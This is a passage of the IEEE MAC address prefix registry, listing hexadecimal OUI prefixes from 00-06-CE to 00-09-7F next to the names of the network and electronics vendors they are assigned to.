(hex) Leaf Imaging Ltd. 00-06-CE (hex) DATENO 00-06-CF (hex) Thales Avionics In-Flight Systems, LLC 00-06-D0 (hex) Elgar Electronics Corp. 00-06-D1 (hex) Tahoe Networks, Inc. 00-06-D2 (hex) Tundra Semiconductor Corp. 00-06-D3 (hex) Alpha Telecom, Inc. U.S.A. 00-06-D4 (hex) Interactive Objects, Inc. 00-06-D5 (hex) Diamond Systems Corp. 00-06-D6 (hex) Cisco Systems, Inc. 00-06-D7 (hex) Cisco Systems, Inc. 00-06-D8 (hex) Maple Optical Systems 00-06-D9 (hex) IPM-Net S.p.A. 00-06-DA (hex) ITRAN Communications Ltd. 00-06-DB (hex) ICHIPS Co., Ltd. 00-06-DC (hex) Syabas Technology (Amquest) 00-06-DD (hex) AT & T Laboratories - Cambridge Ltd 00-06-DE (hex) Flash Technology 00-06-DF (hex) AIDONIC Corporation 00-06-E0 (hex) MAT Co., Ltd. 00-06-E1 (hex) Techno Trade s.a 00-06-E2 (hex) Ceemax Technology Co., Ltd. 00-06-E3 (hex) Quantitative Imaging Corporation 00-06-E4 (hex) Citel Technologies Ltd. 00-06-E5 (hex) Fujian Newland Computer Ltd. Co. 00-06-E6 (hex) DongYang Telecom Co., Ltd. 00-06-E7 (hex) Bit Blitz Communications Inc. 00-06-E8 (hex) Optical Network Testing, Inc. 00-06-E9 (hex) Intime Corp. 00-06-EA (hex) ELZET80 Mikrocomputer GmbH&Co. KG 00-06-EB (hex) Global Data 00-06-EC (hex) Harris Corporation 00-06-ED (hex) Inara Networks 00-06-EE (hex) Shenyang Neu-era Information & Technology Stock Co., Ltd 00-06-EF (hex) Maxxan Systems, Inc. 00-06-F0 (hex) Digeo, Inc. 00-06-F1 (hex) Optillion 00-06-F2 (hex) Platys Communications 00-06-F3 (hex) AcceLight Networks 00-06-F4 (hex) Prime Electronics & Satellitics Inc. 00-06-F5 (hex) ALPS Co,. Ltd. 00-06-F6 (hex) Cisco Systems 00-06-F7 (hex) ALPS Electric Co,. Ltd. 00-06-F8 (hex) CPU Technology, Inc. 00-06-F9 (hex) Mitsui Zosen Systems Research Inc. 00-06-FA (hex) IP SQUARE Co, Ltd. 00-06-FB (hex) Hitachi Printing Solutions, Ltd. 00-06-FC (hex) Fnet Co., Ltd. 00-06-FD (hex) Comjet Information Systems Corp. 00-06-FE (hex) Ambrado, Inc 00-06-FF (hex) Sheba Systems Co., Ltd. 00-07-00 (hex) Zettamedia Korea 00-07-01 (hex) RACAL-DATACOM 00-07-02 (hex) Varian Medical Systems 00-07-03 (hex) CSEE Transport 00-07-04 (hex) ALPS Electric Co,. Ltd. 00-07-05 (hex) Endress & Hauser GmbH & Co 00-07-06 (hex) Sanritz Corporation 00-07-07 (hex) Interalia Inc. 00-07-08 (hex) Bitrage Inc. 00-07-09 (hex) Westerstrand Urfabrik AB 00-07-0A (hex) Unicom Automation Co., Ltd. 00-07-0B (hex) Novabase SGPS, SA 00-07-0C (hex) SVA-Intrusion.com Co. Ltd. 00-07-0D (hex) Cisco Systems Inc. 00-07-0E (hex) Cisco Systems Inc. 00-07-0F (hex) Fujant, Inc. 00-07-10 (hex) Adax, Inc. 00-07-11 (hex) Acterna 00-07-12 (hex) JAL Information Technology 00-07-13 (hex) IP One, Inc. 00-07-14 (hex) Brightcom 00-07-15 (hex) General Research of Electronics, Inc. 00-07-16 (hex) J & S Marine Ltd. 00-07-17 (hex) Wieland Electric GmbH 00-07-18 (hex) iCanTek Co., Ltd. 00-07-19 (hex) Mobiis Co., Ltd. 00-07-1A (hex) Finedigital Inc. 00-07-1B (hex) CDV Americas Ltd 00-07-1C (hex) AT&T Fixed Wireless Services 00-07-1D (hex) Satelsa Sistemas Y Aplicaciones De Telecomunicaciones, S.A. 00-07-1E (hex) Tri-M Engineering / Nupak Dev. Corp. 00-07-1F (hex) European Systems Integration 00-07-20 (hex) Trutzschler GmbH & Co. KG 00-07-21 (hex) Formac Elektronik GmbH 00-07-22 (hex) The Nielsen Company 00-07-23 (hex) ELCON Systemtechnik GmbH 00-07-24 (hex) Telemax Co., Ltd. 00-07-25 (hex) Bematech International Corp. 00-07-26 (hex) Shenzhen Gongjin Electronics Co., Ltd. 00-07-27 (hex) Zi Corporation (HK) Ltd. 00-07-28 (hex) Neo Telecom 00-07-29 (hex) Kistler Instrumente AG 00-07-2A (hex) Innovance Networks 00-07-2B (hex) Jung Myung Telecom Co., Ltd. 00-07-2C (hex) Fabricom 00-07-2D (hex) CNSystems 00-07-2E (hex) North Node AB 00-07-2F (hex) Intransa, Inc. 00-07-30 (hex) Hutchison OPTEL Telecom Technology Co., Ltd. 00-07-31 (hex) Ophir-Spiricon Inc 00-07-32 (hex) AAEON Technology Inc. 00-07-33 (hex) DANCONTROL Engineering 00-07-34 (hex) ONStor, Inc. 00-07-35 (hex) Flarion Technologies, Inc. 00-07-36 (hex) Data Video Technologies Co., Ltd. 00-07-37 (hex) Soriya Co. Ltd. 00-07-38 (hex) Young Technology Co., Ltd. 00-07-39 (hex) Scotty Group Austria Gmbh 00-07-3A (hex) Inventel Systemes 00-07-3B (hex) Tenovis GmbH & Co KG 00-07-3C (hex) Telecom Design 00-07-3D (hex) Nanjing Postel Telecommunications Co., Ltd. 00-07-3E (hex) China Great-Wall Computer Shenzhen Co., Ltd. 00-07-3F (hex) Woojyun Systec Co., Ltd. 00-07-40 (hex) Buffalo, Inc 00-07-41 (hex) Sierra Automated Systems 00-07-42 (hex) Current Technologies, LLC 00-07-43 (hex) Chelsio Communications 00-07-44 (hex) Unico, Inc. 00-07-45 (hex) Radlan Computer Communications Ltd. 00-07-46 (hex) TURCK, Inc. 00-07-47 (hex) Mecalc 00-07-48 (hex) The Imaging Source Europe 00-07-49 (hex) CENiX Inc. 00-07-4A (hex) Carl Valentin GmbH 00-07-4B (hex) Daihen Corporation 00-07-4C (hex) Beicom Inc. 00-07-4D (hex) Zebra Technologies Corp. 00-07-4E (hex) Naughty boy co., Ltd. 00-07-4F (hex) Cisco Systems, Inc. 00-07-50 (hex) Cisco Systems, Inc. 00-07-51 (hex) m·u·t AG 00-07-52 (hex) Rhythm Watch Co., Ltd. 00-07-53 (hex) Beijing Qxcomm Technology Co., Ltd. 00-07-54 (hex) Xyterra Computing, Inc. 00-07-55 (hex) Lafon SA 00-07-56 (hex) Juyoung Telecom 00-07-57 (hex) Topcall International AG 00-07-58 (hex) Dragonwave 00-07-59 (hex) Boris Manufacturing Corp. 00-07-5A (hex) Air Products and Chemicals, Inc. 00-07-5B (hex) Gibson Guitars 00-07-5C (hex) Eastman Kodak Company 00-07-5D (hex) Celleritas Inc. 00-07-5E (hex) Ametek Power Instruments 00-07-5F (hex) VCS Video Communication Systems AG 00-07-60 (hex) TOMIS Information & Telecom Corp. 00-07-61 (hex) Logitech SA 00-07-62 (hex) Group Sense Limited 00-07-63 (hex) Sunniwell Cyber Tech. Co., Ltd. 00-07-64 (hex) YoungWoo Telecom Co. Ltd. 00-07-65 (hex) Jade Quantum Technologies, Inc. 00-07-66 (hex) Chou Chin Industrial Co., Ltd. 00-07-67 (hex) Yuxing Electronics Company Limited 00-07-68 (hex) Danfoss A/S 00-07-69 (hex) Italiana Macchi SpA 00-07-6A (hex) NEXTEYE Co., Ltd. 00-07-6B (hex) Stralfors AB 00-07-6C (hex) Daehanet, Inc. 00-07-6D (hex) Flexlight Networks 00-07-6E (hex) Sinetica Corporation Limited 00-07-6F (hex) Synoptics Limited 00-07-70 (hex) Locusnetworks Corporation 00-07-71 (hex) Embedded System Corporation 00-07-72 (hex) Alcatel Shanghai Bell Co., Ltd. 00-07-73 (hex) Ascom Powerline Communications Ltd. 00-07-74 (hex) GuangZhou Thinker Technology Co. Ltd. 00-07-75 (hex) Valence Semiconductor, Inc. 00-07-76 (hex) Federal APD 00-07-77 (hex) Motah Ltd. 00-07-78 (hex) GERSTEL GmbH & Co. KG 00-07-79 (hex) Sungil Telecom Co., Ltd. 00-07-7A (hex) Infoware System Co., Ltd. 00-07-7B (hex) Millimetrix Broadband Networks 00-07-7C (hex) Westermo Teleindustri AB 00-07-7D (hex) Cisco Systems 00-07-7E (hex) Elrest GmbH 00-07-7F (hex) J Communications Co., Ltd. 00-07-80 (hex) Bluegiga Technologies OY 00-07-81 (hex) Itron Inc. 00-07-82 (hex) Oracle Corporation 00-07-83 (hex) SynCom Network, Inc. 00-07-84 (hex) Cisco Systems Inc. 00-07-85 (hex) Cisco Systems Inc. 00-07-86 (hex) Wireless Networks Inc. 00-07-87 (hex) Idea System Co., Ltd. 00-07-88 (hex) Clipcomm, Inc. 00-07-89 (hex) DONGWON SYSTEMS 00-07-8A (hex) Mentor Data System Inc. 00-07-8B (hex) Wegener Communications, Inc. 00-07-8C (hex) Elektronikspecialisten i Borlange AB 00-07-8D (hex) NetEngines Ltd. 00-07-8E (hex) Garz & Friche GmbH 00-07-8F (hex) Emkay Innovative Products 00-07-90 (hex) Tri-M Technologies (s) Limited 00-07-91 (hex) International Data Communications, Inc. 00-07-92 (hex) Suetron Electronic GmbH 00-07-93 (hex) Shin Satellite Public Company Limited 00-07-94 (hex) Simple Devices, Inc. 00-07-95 (hex) Elitegroup Computer System Co. (ECS) 00-07-96 (hex) LSI Systems, Inc. 00-07-97 (hex) Netpower Co., Ltd. 00-07-98 (hex) Selea SRL 00-07-99 (hex) Tipping Point Technologies, Inc. 00-07-9A (hex) Verint Systems Inc 00-07-9B (hex) Aurora Networks 00-07-9C (hex) Golden Electronics Technology Co., Ltd. 00-07-9D (hex) Musashi Co., Ltd. 00-07-9E (hex) Ilinx Co., Ltd. 00-07-9F (hex) Action Digital Inc. 00-07-A0 (hex) e-Watch Inc. 00-07-A1 (hex) VIASYS Healthcare GmbH 00-07-A2 (hex) Opteon Corporation 00-07-A3 (hex) Ositis Software, Inc. 00-07-A4 (hex) GN Netcom Ltd. 00-07-A5 (hex) Y.D.K Co. Ltd. 00-07-A6 (hex) Home Automation, Inc. 00-07-A7 (hex) A-Z Inc. 00-07-A8 (hex) Haier Group Technologies Ltd. 00-07-A9 (hex) Novasonics 00-07-AA (hex) Quantum Data Inc. 00-07-AB (hex) Samsung Electronics Co.,Ltd 00-07-AC (hex) Eolring 00-07-AD (hex) Pentacon GmbH Foto-und Feinwerktechnik 00-07-AE (hex) Britestream Networks, Inc. 00-07-AF (hex) N-TRON Corporation 00-07-B0 (hex) Office Details, Inc. 00-07-B1 (hex) Equator Technologies 00-07-B2 (hex) Transaccess S.A. 00-07-B3 (hex) Cisco Systems Inc. 00-07-B4 (hex) Cisco Systems Inc. 00-07-B5 (hex) Any One Wireless Ltd. 00-07-B6 (hex) Telecom Technology Ltd. 00-07-B7 (hex) Samurai Ind. Prods Eletronicos Ltda 00-07-B8 (hex) Corvalent Corporation 00-07-B9 (hex) Ginganet Corporation 00-07-BA (hex) UTStarcom, Inc. 00-07-BB (hex) Candera Inc. 00-07-BC (hex) Identix Inc. 00-07-BD (hex) Radionet Ltd. 00-07-BE (hex) DataLogic SpA 00-07-BF (hex) Armillaire Technologies, Inc. 00-07-C0 (hex) NetZerver Inc. 00-07-C1 (hex) Overture Networks, Inc. 00-07-C2 (hex) Netsys Telecom 00-07-C3 (hex) Thomson 00-07-C4 (hex) JEAN Co. Ltd. 00-07-C5 (hex) Gcom, Inc. 00-07-C6 (hex) VDS Vosskuhler GmbH 00-07-C7 (hex) Synectics Systems Limited 00-07-C8 (hex) Brain21, Inc. 00-07-C9 (hex) Technol Seven Co., Ltd. 00-07-CA (hex) Creatix Polymedia Ges Fur Kommunikaitonssysteme 00-07-CB (hex) Freebox SA 00-07-CC (hex) Kaba Benzing GmbH 00-07-CD (hex) NMTEL Co., Ltd. 00-07-CE (hex) Cabletime Limited 00-07-CF (hex) Anoto AB 00-07-D0 (hex) Automat Engenharia de Automaoa Ltda. 00-07-D1 (hex) Spectrum Signal Processing Inc. 00-07-D2 (hex) Logopak Systeme 00-07-D3 (hex) Stork Prints B.V. 00-07-D4 (hex) Zhejiang Yutong Network Communication Co Ltd. 00-07-D5 (hex) 3e Technologies Int;., Inc. 00-07-D6 (hex) Commil Ltd. 00-07-D7 (hex) Caporis Networks AG 00-07-D8 (hex) Hitron Systems Inc. 00-07-D9 (hex) Splicecom 00-07-DA (hex) Neuro Telecom Co., Ltd. 00-07-DB (hex) Kirana Networks, Inc. 00-07-DC (hex) Atek Co, Ltd. 00-07-DD (hex) Cradle Technologies 00-07-DE (hex) eCopilt AB 00-07-DF (hex) Vbrick Systems Inc. 00-07-E0 (hex) Palm Inc. 00-07-E1 (hex) WIS Communications Co. Ltd. 00-07-E2 (hex) Bitworks, Inc. 00-07-E3 (hex) Navcom Technology, Inc. 00-07-E4 (hex) SoftRadio Co., Ltd. 00-07-E5 (hex) Coup Corporation 00-07-E6 (hex) edgeflow Canada Inc. 00-07-E7 (hex) FreeWave Technologies 00-07-E8 (hex) EdgeWave 00-07-E9 (hex) Intel Corporation 00-07-EA (hex) Massana, Inc. 00-07-EB (hex) Cisco Systems Inc. 00-07-EC (hex) Cisco Systems Inc. 00-07-ED (hex) Altera Corporation 00-07-EE (hex) telco Informationssysteme GmbH 00-07-EF (hex) Lockheed Martin Tactical Systems 00-07-F0 (hex) LogiSync LLC 00-07-F1 (hex) TeraBurst Networks Inc. 00-07-F2 (hex) IOA Corporation 00-07-F3 (hex) Thinkengine Networks 00-07-F4 (hex) Eletex Co., Ltd. 00-07-F5 (hex) Bridgeco Co AG 00-07-F6 (hex) Qqest Software Systems 00-07-F7 (hex) Galtronics 00-07-F8 (hex) ITDevices, Inc. 00-07-F9 (hex) Phonetics, Inc. 00-07-FA (hex) ITT Co., Ltd. 00-07-FB (hex) Giga Stream UMTS Technologies GmbH 00-07-FC (hex) Adept Systems Inc. 00-07-FD (hex) LANergy Ltd. 00-07-FE (hex) Rigaku Corporation 00-07-FF (hex) Gluon Networks 00-08-00 (hex) MULTITECH SYSTEMS, INC. 00-08-01 (hex) HighSpeed Surfing Inc. 00-08-02 (hex) Hewlett-Packard Company 00-08-03 (hex) Cos Tron 00-08-04 (hex) ICA Inc. 00-08-05 (hex) Techno-Holon Corporation 00-08-06 (hex) Raonet Systems, Inc. 00-08-07 (hex) Access Devices Limited 00-08-08 (hex) PPT Vision, Inc. 00-08-09 (hex) Systemonic AG 00-08-0A (hex) Espera-Werke GmbH 00-08-0B (hex) Birka BPA Informationssystem AB 00-08-0C (hex) VDA Elettronica spa 00-08-0D (hex) Toshiba 00-08-0E (hex) Motorola Mobility, Inc. 00-08-0F (hex) Proximion Fiber Optics AB 00-08-10 (hex) Key Technology, Inc. 00-08-11 (hex) VOIX Corporation 00-08-12 (hex) GM-2 Corporation 00-08-13 (hex) Diskbank, Inc. 00-08-14 (hex) TIL Technologies 00-08-15 (hex) CATS Co., Ltd. 00-08-16 (hex) Bluetags A/S 00-08-17 (hex) EmergeCore Networks LLC 00-08-18 (hex) Pixelworks, Inc. 00-08-19 (hex) Banksys 00-08-1A (hex) Sanrad Intelligence Storage Communications (2000) Ltd. 00-08-1B (hex) Windigo Systems 00-08-1C (hex) @pos.com 00-08-1D (hex) Ipsil, Incorporated 00-08-1E (hex) Repeatit AB 00-08-1F (hex) Pou Yuen Tech Corp. Ltd. 00-08-20 (hex) Cisco Systems Inc. 00-08-21 (hex) Cisco Systems Inc. 00-08-22 (hex) InPro Comm 00-08-23 (hex) Texa Corp. 00-08-24 (hex) Copitrak Inc 00-08-25 (hex) Acme Packet 00-08-26 (hex) Colorado Med Tech 00-08-27 (hex) Pirelli Broadband Solutions 00-08-28 (hex) Koei Engineering Ltd. 00-08-29 (hex) Aval Nagasaki Corporation 00-08-2A (hex) Powerwallz Network Security 00-08-2B (hex) Wooksung Electronics, Inc. 00-08-2C (hex) Homag AG 00-08-2D (hex) Indus Teqsite Private Limited 00-08-2E (hex) Multitone Electronics PLC 00-08-2F (hex) Cisco Systems 00-08-30 (hex) Cisco Systems 00-08-31 (hex) Cisco Systems 00-08-4E (hex) DivergeNet, Inc. 00-08-4F (hex) Qualstar Corporation 00-08-50 (hex) Arizona Instrument Corp. 00-08-51 (hex) Canadian Bank Note Company, Ltd. 00-08-52 (hex) Davolink Co. Inc. 00-08-53 (hex) Schleicher GmbH & Co. Relaiswerke KG 00-08-54 (hex) Netronix, Inc. 00-08-55 (hex) NASA-Goddard Space Flight Center 00-08-56 (hex) Gamatronic Electronic Industries Ltd. 00-08-57 (hex) Polaris Networks, Inc. 00-08-58 (hex) Novatechnology Inc. 00-08-59 (hex) ShenZhen Unitone Electronics Co., Ltd. 00-08-5A (hex) IntiGate Inc. 00-08-5B (hex) Hanbit Electronics Co., Ltd. 00-08-5C (hex) Shanghai Dare Technologies Co. Ltd. 00-08-5D (hex) Aastra 00-08-5E (hex) PCO AG 00-08-5F (hex) Picanol N.V. 00-08-60 (hex) LodgeNet Entertainment Corp. 00-08-61 (hex) SoftEnergy Co., Ltd. 00-08-62 (hex) NEC Eluminant Technologies, Inc. 00-08-63 (hex) Entrisphere Inc. 00-08-64 (hex) Fasy S.p.A. 00-08-65 (hex) JASCOM CO., LTD 00-08-66 (hex) DSX Access Systems, Inc. 00-08-67 (hex) Uptime Devices 00-08-68 (hex) PurOptix 00-08-69 (hex) Command-e Technology Co.,Ltd. 00-08-6A (hex) Securiton Gmbh 00-08-6B (hex) MIPSYS 00-08-6C (hex) Plasmon LMS 00-08-6D (hex) Missouri FreeNet 00-08-6E (hex) Hyglo AB 00-08-6F (hex) Resources Computer Network Ltd. 00-08-70 (hex) Rasvia Systems, Inc. 00-08-71 (hex) NORTHDATA Co., Ltd. 00-08-72 (hex) Sorenson Communications 00-08-73 (hex) DapTechnology B.V. 00-08-74 (hex) Dell Computer Corp. 00-08-75 (hex) Acorp Electronics Corp. 00-08-76 (hex) SDSystem 00-08-77 (hex) Liebert-Hiross Spa 00-08-78 (hex) Benchmark Storage Innovations 00-08-79 (hex) CEM Corporation 00-08-7A (hex) Wipotec GmbH 00-08-7B (hex) RTX Telecom A/S 00-08-7C (hex) Cisco Systems, Inc. 00-08-7D (hex) Cisco Systems Inc. 00-08-7E (hex) Bon Electro-Telecom Inc. 00-08-7F (hex) SPAUN electronic GmbH & Co. KG 00-08-80 (hex) BroadTel Canada Communications inc. 00-08-81 (hex) DIGITAL HANDS CO.,LTD. 00-08-82 (hex) SIGMA CORPORATION 00-08-83 (hex) Hewlett-Packard Company 00-08-84 (hex) Index Braille AB 00-08-85 (hex) EMS Dr. Thomas Wuensche 00-08-86 (hex) Hansung Teliann, Inc. 00-08-87 (hex) Maschinenfabrik Reinhausen GmbH 00-08-88 (hex) OULLIM Information Technology Inc,. 00-08-89 (hex) Echostar Technologies Corp 00-08-8A (hex) Minds@Work 00-08-8B (hex) Tropic Networks Inc. 00-08-8C (hex) Quanta Network Systems Inc. 00-08-8D (hex) Sigma-Links Inc. 00-08-8E (hex) Nihon Computer Co., Ltd. 00-08-8F (hex) ADVANCED DIGITAL TECHNOLOGY 00-08-90 (hex) AVILINKS SA 00-08-91 (hex) Lyan Inc. 00-08-92 (hex) EM Solutions 00-08-93 (hex) LE INFORMATION COMMUNICATION INC. 00-08-94 (hex) InnoVISION Multimedia Ltd. 00-08-95 (hex) DIRC Technologie GmbH & Co.KG 00-08-96 (hex) Printronix, Inc. 00-08-97 (hex) Quake Technologies 00-08-98 (hex) Gigabit Optics Corporation 00-08-99 (hex) Netbind, Inc. 00-08-9A (hex) Alcatel Microelectronics 00-08-9B (hex) ICP Electronics Inc. 00-08-9C (hex) Elecs Industry Co., Ltd. 00-08-9D (hex) UHD-Elektronik 00-08-9E (hex) Beijing Enter-Net co.LTD 00-08-9F (hex) EFM Networks 00-08-A0 (hex) Stotz Feinmesstechnik GmbH 00-08-A1 (hex) CNet Technology Inc. 00-08-A2 (hex) ADI Engineering, Inc. 00-08-A3 (hex) Cisco Systems 00-08-A4 (hex) Cisco Systems 00-08-A5 (hex) Peninsula Systems Inc. 00-08-A6 (hex) Multiware & Image Co., Ltd. 00-08-A7 (hex) iLogic Inc. 00-08-A8 (hex) Systec Co., Ltd. 00-08-A9 (hex) SangSang Technology, Inc. 00-08-AA (hex) KARAM 00-08-AB (hex) EnerLinx.com, Inc. 00-08-AC (hex) Eltromat GmbH 00-08-AD (hex) Toyo-Linx Co., Ltd. 00-08-AE (hex) PacketFront International AB 00-08-AF (hex) Novatec Corporation 00-08-B0 (hex) BKtel communications GmbH 00-08-B1 (hex) ProQuent Systems 00-08-B2 (hex) SHENZHEN COMPASS TECHNOLOGY DEVELOPMENT CO.,LTD 00-08-B3 (hex) Fastwel 00-08-B4 (hex) SYSPOL 00-08-B5 (hex) TAI GUEN ENTERPRISE CO., LTD 00-08-B6 (hex) RouteFree, Inc. 00-08-B7 (hex) HIT Incorporated 00-08-B8 (hex) E.F. Johnson 00-08-B9 (hex) KAON MEDIA Co., Ltd. 00-08-BA (hex) Erskine Systems Ltd 00-08-BB (hex) NetExcell 00-08-BC (hex) Ilevo AB 00-08-BD (hex) TEPG-US 00-08-BE (hex) XENPAK MSA Group 00-08-BF (hex) Aptus Elektronik AB 00-08-C0 (hex) ASA SYSTEMS 00-08-C1 (hex) Avistar Communications Corporation 00-08-C2 (hex) Cisco Systems 00-08-C3 (hex) Contex A/S 00-08-C4 (hex) Hikari Co.,Ltd. 00-08-C5 (hex) Liontech Co., Ltd. 00-08-C6 (hex) Philips Consumer Communications 00-08-C7 (hex) Hewlett-Packard Company 00-08-C8 (hex) Soneticom, Inc. 00-08-C9 (hex) TechniSat Digital GmbH 00-08-CA (hex) TwinHan Technology Co.,Ltd 00-08-CB (hex) Zeta Broadband Inc. 00-08-CC (hex) Remotec, Inc. 00-08-CD (hex) With-Net Inc 00-08-CE (hex) IPMobileNet Inc. 00-08-CF (hex) Nippon Koei Power Systems Co., Ltd. 00-08-D0 (hex) Musashi Engineering Co., LTD. 00-08-D1 (hex) KAREL INC. 00-08-D2 (hex) ZOOM Networks Inc. 00-08-D3 (hex) Hercules Technologies S.A. 00-08-D4 (hex) IneoQuest Technologies, Inc 00-08-D5 (hex) Vanguard Networks Solutions, LLC 00-08-D6 (hex) HASSNET Inc. 00-08-D7 (hex) HOW CORPORATION 00-08-D8 (hex) Dowkey Microwave 00-08-D9 (hex) Mitadenshi Co.,LTD 00-08-DA (hex) SofaWare Technologies Ltd. 00-08-DB (hex) Corrigent Systems 00-08-DC (hex) Wiznet 00-08-DD (hex) Telena Communications, Inc. 00-08-DE (hex) 3UP Systems 00-08-DF (hex) Alistel Inc. 00-08-E0 (hex) ATO Technology Ltd. 00-08-E1 (hex) Barix AG 00-08-E2 (hex) Cisco Systems 00-08-E3 (hex) Cisco Systems 00-08-E4 (hex) Envenergy Inc 00-08-E5 (hex) IDK Corporation 00-08-E6 (hex) Littlefeet 00-08-E7 (hex) SHI ControlSystems,Ltd. 00-08-E8 (hex) Excel Master Ltd. 00-08-E9 (hex) NextGig 00-08-EA (hex) Motion Control Engineering, Inc 00-08-EB (hex) ROMWin Co.,Ltd. 00-08-EC (hex) Optical Zonu Corporation 00-08-ED (hex) ST&T Instrument Corp. 00-08-EE (hex) Logic Product Development 00-08-EF (hex) DIBAL,S.A. 00-08-F0 (hex) Next Generation Systems, Inc. 00-08-F1 (hex) Voltaire 00-08-F2 (hex) C&S Technology 00-08-F3 (hex) WANY 00-08-F4 (hex) Bluetake Technology Co., Ltd. 00-08-F5 (hex) YESTECHNOLOGY Co.,Ltd. 00-08-F6 (hex) Sumitomo Electric System Solutions Co.,Ltd. 00-08-F7 (hex) Hitachi Ltd, Semiconductor & Integrated Circuits Gr 00-08-F8 (hex) Guardall Ltd 00-08-F9 (hex) Emerson Network Power 00-08-FA (hex) Karl E.Brinkmann GmbH 00-08-FB (hex) SonoSite, Inc. 00-08-FC (hex) Gigaphoton Inc. 00-08-FD (hex) BlueKorea Co., Ltd. 00-08-FE (hex) UNIK C&C Co.,Ltd. 00-08-FF (hex) Trilogy Communications Ltd 00-09-00 (hex) TMT 00-09-01 (hex) Shenzhen Shixuntong Information & Technoligy Co 00-09-02 (hex) Redline Communications Inc. 00-09-03 (hex) Panasas, Inc 00-09-04 (hex) MONDIAL electronic 00-09-05 (hex) iTEC Technologies Ltd. 00-09-06 (hex) Esteem Networks 00-09-07 (hex) Chrysalis Development 00-09-08 (hex) VTech Technology Corp. 00-09-09 (hex) Telenor Connect A/S 00-09-0A (hex) SnedFar Technology Co., Ltd. 00-09-0B (hex) MTL Instruments PLC 00-09-0C (hex) Mayekawa Mfg. Co. Ltd. 00-09-0D (hex) LEADER ELECTRONICS CORP. 00-09-0E (hex) Helix Technology Inc. 00-09-0F (hex) Fortinet Inc. 00-09-10 (hex) Simple Access Inc. 00-09-11 (hex) Cisco Systems 00-09-12 (hex) Cisco Systems 00-09-13 (hex) SystemK Corporation 00-09-14 (hex) COMPUTROLS INC. 00-09-15 (hex) CAS Corp. 00-09-16 (hex) Listman Home Technologies, Inc. 00-09-17 (hex) WEM Technology Inc 00-09-18 (hex) SAMSUNG TECHWIN CO.,LTD 00-09-19 (hex) MDS Gateways 00-09-1A (hex) Macat Optics & Electronics Co., Ltd. 00-09-1B (hex) Digital Generation Inc. 00-09-1C (hex) CacheVision, Inc 00-09-1D (hex) Proteam Computer Corporation 00-09-1E (hex) Firstech Technology Corp. 00-09-1F (hex) A&D Co., Ltd. 00-09-20 (hex) EpoX COMPUTER CO.,LTD. 00-09-21 (hex) Planmeca Oy 00-09-22 (hex) TST Biometrics GmbH 00-09-23 (hex) Heaman System Co., Ltd 00-09-24 (hex) Telebau GmbH 00-09-25 (hex) VSN Systemen BV 00-09-26 (hex) YODA COMMUNICATIONS, INC. 00-09-27 (hex) TOYOKEIKI CO.,LTD. 00-09-28 (hex) Telecore 00-09-29 (hex) Sanyo Industries (UK) Limited 00-09-2A (hex) MYTECS Co.,Ltd. 00-09-2B (hex) iQstor Networks, Inc. 00-09-2C (hex) Hitpoint Inc. 00-09-2D (hex) HTC Corporation 00-09-2E (hex) B&Tech System Inc. 00-09-2F (hex) Akom Technology Corporation 00-09-30 (hex) AeroConcierge Inc. 00-09-31 (hex) Future Internet, Inc. 00-09-32 (hex) Omnilux 00-09-33 (hex) Ophit Co.Ltd. 00-09-34 (hex) Dream-Multimedia-Tv GmbH 00-09-35 (hex) Sandvine Incorporated 00-09-36 (hex) Ipetronik GmbH & Co.KG 00-09-37 (hex) Inventec Appliance Corp 00-09-38 (hex) Allot Communications 00-09-39 (hex) ShibaSoku Co.,Ltd. 00-09-3A (hex) Molex Fiber Optics 00-09-3B (hex) HYUNDAI NETWORKS INC. 00-09-3C (hex) Jacques Technologies P/L 00-09-3D (hex) Newisys,Inc. 00-09-3E (hex) C&I Technologies 00-09-3F (hex) Double-Win Enterpirse CO., LTD 00-09-40 (hex) AGFEO GmbH & Co. KG 00-09-41 (hex) Allied Telesis K.K. 00-09-42 (hex) Wireless Technologies, Inc 00-09-43 (hex) Cisco Systems 00-09-44 (hex) Cisco Systems 00-09-45 (hex) Palmmicro Communications Inc 00-09-46 (hex) Cluster Labs GmbH 00-09-47 (hex) Aztek, Inc. 00-09-48 (hex) Vista Control Systems, Corp. 00-09-49 (hex) Glyph Technologies Inc. 00-09-4A (hex) Homenet Communications 00-09-4B (hex) FillFactory NV 00-09-4C (hex) Communication Weaver Co.,Ltd. 00-09-4D (hex) Braintree Communications Pty Ltd 00-09-4E (hex) BARTECH SYSTEMS INTERNATIONAL, INC 00-09-4F (hex) elmegt GmbH & Co. KG 00-09-50 (hex) Independent Storage Corporation 00-09-51 (hex) Apogee Imaging Systems 00-09-52 (hex) Auerswald GmbH & Co. KG 00-09-53 (hex) Linkage System Integration Co.Ltd. 00-09-54 (hex) AMiT spol. s. r. o. 00-09-55 (hex) Young Generation International Corp. 00-09-56 (hex) Network Systems Group, Ltd. (NSG) 00-09-57 (hex) Supercaller, Inc. 00-09-58 (hex) INTELNET S.A. 00-09-59 (hex) Sitecsoft 00-09-5A (hex) RACEWOOD TECHNOLOGY 00-09-5B (hex) Netgear, Inc. 00-09-5C (hex) Philips Medical Systems - Cardiac and Monitoring Systems (CM 00-09-5D (hex) Dialogue Technology Corp. 00-09-5E (hex) Masstech Group Inc. 00-09-5F (hex) Telebyte, Inc. 00-09-60 (hex) YOZAN Inc. 00-09-61 (hex) Switchgear and Instrumentation Ltd 00-09-62 (hex) Sonitor Technologies AS 00-09-63 (hex) Dominion Lasercom Inc. 00-09-64 (hex) Hi-Techniques, Inc. 00-09-65 (hex) HyunJu Computer Co., Ltd. 00-09-66 (hex) Thales Navigation 00-09-67 (hex) Tachyon, Inc 00-09-68 (hex) TECHNOVENTURE, INC. 00-09-69 (hex) Meret Optical Communications 00-09-6A (hex) Cloverleaf Communications Inc. 00-09-6B (hex) IBM Corp 00-09-6C (hex) Imedia Semiconductor Corp. 00-09-6D (hex) Powernet Technologies Corp. 00-09-6E (hex) GIANT ELECTRONICS LTD. 00-09-6F (hex) Beijing Zhongqing Elegant Tech. Corp.,Limited 00-09-70 (hex) Vibration Research Corporation 00-09-71 (hex) Time Management, Inc. 00-09-72 (hex) Securebase,Inc 00-09-73 (hex) Lenten Technology Co., Ltd. 00-09-74 (hex) Innopia Technologies, Inc. 00-09-75 (hex) fSONA Communications Corporation 00-09-76 (hex) Datasoft ISDN Systems GmbH 00-09-77 (hex) Brunner Elektronik AG 00-09-78 (hex) AIJI System Co., Ltd. 00-09-79 (hex) Advanced Television Systems Committee, Inc. 00-09-7A (hex) Louis Design Labs. 00-09-7B (hex) Cisco Systems 00-09-7C (hex) Cisco Systems 00-09-7D (hex) SecWell Networks Oy 00-09-7E (hex) IMI TECHNOLOGY CO., LTD 00-09-7F (hex) Vsecure 2000 